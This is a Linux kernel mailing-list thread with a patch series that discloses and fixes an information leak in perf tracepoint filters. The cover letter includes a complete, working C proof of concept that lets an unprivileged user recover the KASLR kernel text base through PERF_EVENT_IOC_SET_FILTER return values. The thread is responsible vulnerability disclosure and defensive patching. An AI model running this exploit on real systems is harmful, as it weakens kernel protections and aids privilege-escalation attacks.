mirror of https://lore.kernel.org/lkml/
 help / color / mirror / Atom feed
* [PATCH v2 0/1] perf/core: Prevent tracepoint filters from exposing the kernel text base
@ 2026-10-01 23:46 Zhengchuan Liang
  2026-10-01 23:46 ` [PATCH v2 1/1] perf/core: Restrict function predicates in trace event filters Zhengchuan Liang
  0 siblings, 1 reply; 2+ messages in thread
From: Zhengchuan Liang @ 2026-10-01 23:46 UTC (permalink / raw)
  To: Peter Zijlstra
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
	Adrian Hunter, James Clark, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Ross Zwisler, linux-perf-users,
	linux-trace-kernel, linux-kernel, Zhengchuan Liang

Hi,

I found and validated an information leak in
kernel/trace/trace_events_filter.c. An unprivileged user can recover the
randomized kernel text base, revealing the kernel's KASLR slide, by
observing PERF_EVENT_IOC_SET_FILTER return values for a disabled,
count-only perf tracepoint event.

Such an event can be opened with exclude_kernel=1 and sample_type=0. The
ioctl nevertheless accepts .function predicates. A numeric operand is
passed to kallsyms_lookup_size_offset(), so success distinguishes an
address in the kernel image from one outside it. A symbolic operand
likewise resolves a kernel symbol internally and can compare its address
with a task-controlled tracepoint field.

Here is a minimized numeric PoC for an x86_64 kernel built with
CONFIG_KALLSYMS_ALL=y. The scan uses 2 MiB steps, the minimum permitted
value of CONFIG_PHYSICAL_ALIGN on x86_64, and covers the 1 GiB virtual
KASLR window. Event ID 5 identifies the built-in TRACE_PRINT event.
The upstream default is perf_event_paranoid=2. Some distributions retain
that setting, while others use a stricter value. With the default
setting, run the PoC as an unprivileged user:

  #define _GNU_SOURCE
  #include <linux/perf_event.h>
  #include <stdio.h>
  #include <sys/ioctl.h>
  #include <sys/syscall.h>
  #include <unistd.h>

  int main(void)
  {
          struct perf_event_attr a = {
                  .type = PERF_TYPE_TRACEPOINT, .size = sizeof(a),
                  .config = 5, .disabled = 1, .exclude_kernel = 1,
          };
          int fd = syscall(SYS_perf_event_open, &a, 0, -1, -1, 0);
          char filter[64];

          if (fd < 0)
                  return 1;
          for (unsigned long long p = 0xffffffff80000000ULL;
               p < 0xffffffffc0000000ULL; p += 0x200000ULL) {
                  snprintf(filter, sizeof(filter),
                           "ip.function == 0x%llx", p);
                  if (!ioctl(fd, PERF_EVENT_IOC_SET_FILTER, filter)) {
                          printf("_stext=0x%llx\n", p);
                          return 0;
                  }
          }
          return 2;
  }

I reproduced the leak under these conditions as an unprivileged user on
a kernel built from the current upstream tree. The reported _stext
matched the value in /proc/kallsyms as read by root. The PoC needs no
tracefs access or perf sample data.

^ permalink raw reply	[flat|nested] 2+ messages in thread

* [PATCH v2 1/1] perf/core: Restrict function predicates in trace event filters
  2026-10-01 23:46 [PATCH v2 0/1] perf/core: Prevent tracepoint filters from exposing the kernel text base Zhengchuan Liang
@ 2026-10-01 23:46 ` Zhengchuan Liang
  0 siblings, 0 replies; 2+ messages in thread
From: Zhengchuan Liang @ 2026-10-01 23:46 UTC (permalink / raw)
  To: Peter Zijlstra
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Mark Rutland, Alexander Shishkin, Jiri Olsa, Ian Rogers,
	Adrian Hunter, James Clark, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Ross Zwisler, linux-perf-users,
	linux-trace-kernel, linux-kernel, Zhengchuan Liang

Count-only perf tracepoint events can be opened without tracepoint
permission because they do not expose raw sample data. Their
PERF_EVENT_IOC_SET_FILTER ioctl can still pass filter expressions to the
tracing parser.

A .function operand makes the parser resolve either a numeric kernel
address or a kernel symbol. The ioctl return value can therefore be used
as an oracle to recover the randomized kernel text base.

Trace events marked TRACE_EVENT_FL_CAP_ANY are different: task-local
events may expose their raw fields to unprivileged users. Syscall
tracepoints and uprobes deliberately use this exception, so denying every
filter without tracepoint permission would break their ordinary filters.

Check perf_allow_tracepoint() in perf. If permission is denied, continue
only for a task-attached TRACE_EVENT_FL_CAP_ANY event whose filter does
not contain an unquoted .function postfix. This rejects the predicate
before the tracing parser can resolve either form of operand. The scan
uses the parser's quote rules, so .function inside a string operand
remains an ordinary filter value.

This preserves ordinary filters on task-local events whose fields are
already available to the caller, while non-CAP_ANY filters and kernel
address resolution remain unavailable without tracepoint permission.

Fixes: e6745a4da964 ("tracing: Add a way to filter function addresses to function names")
Cc: stable@vger.kernel.org
Assisted-by: LLM
Signed-off-by: Zhengchuan Liang <zcliangcn@gmail.com>
---
Changes in v2:
- Keep the entire fix in perf, without modifying kernel/trace/*, as
  requested by Steven.
- Preserve ordinary filters for task-local TRACE_EVENT_FL_CAP_ANY events
  while rejecting their unquoted .function predicates without tracepoint
  permission.
- Reject all filters on other trace events without tracepoint permission.
- Follow the tracing parser's quote rules so .function inside a string
  operand remains an ordinary value.

v1: https://lore.kernel.org/all/95d3721fa8d4c7a4577ec14e9d7caec4fd0cefcc.1790553331.git.zcliangcn@gmail.com/

 kernel/events/core.c | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 634d2ccbab82..11db8689ac90 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -12251,6 +12251,33 @@ perf_event_set_addr_filter(struct perf_event *event, char *filter_str)
 	return ret;
 }
 
+#ifdef CONFIG_EVENT_TRACING
+static bool perf_event_filter_has_function(const char *filter_str)
+{
+	char quote = 0;
+
+	for (; *filter_str; filter_str++) {
+		if (quote) {
+			if (*filter_str == quote)
+				quote = 0;
+			continue;
+		}
+
+		switch (*filter_str) {
+		case '\'':
+		case '"':
+			quote = *filter_str;
+			break;
+		default:
+			if (str_has_prefix(filter_str, ".function"))
+				return true;
+		}
+	}
+
+	return false;
+}
+#endif
+
 static int perf_event_set_filter(struct perf_event *event, void __user *arg)
 {
 	int ret = -EINVAL;
@@ -12264,6 +12291,14 @@ static int perf_event_set_filter(struct perf_event *event, void __user *arg)
 	if (perf_event_is_tracing(event)) {
 		struct perf_event_context *ctx = event->ctx;
 
+		ret = perf_allow_tracepoint();
+		if (ret && (!(event->attach_state & PERF_ATTACH_TASK) ||
+			    !(event->tp_event->flags & TRACE_EVENT_FL_CAP_ANY) ||
+			    perf_event_filter_has_function(filter_str))) {
+			kfree(filter_str);
+			return ret;
+		}
+
 		/*
 		 * Beware, here be dragons!!
 		 *
-- 
2.25.1

^ permalink raw reply	[flat|nested] 2+ messages in thread

end of thread, other threads:[~2026-10-01 23:46 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-10-01 23:46 [PATCH v2 0/1] perf/core: Prevent tracepoint filters from exposing the kernel text base Zhengchuan Liang
2026-10-01 23:46 ` [PATCH v2 1/1] perf/core: Restrict function predicates in trace event filters Zhengchuan Liang

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox

all inboxes | Powered by JetHome®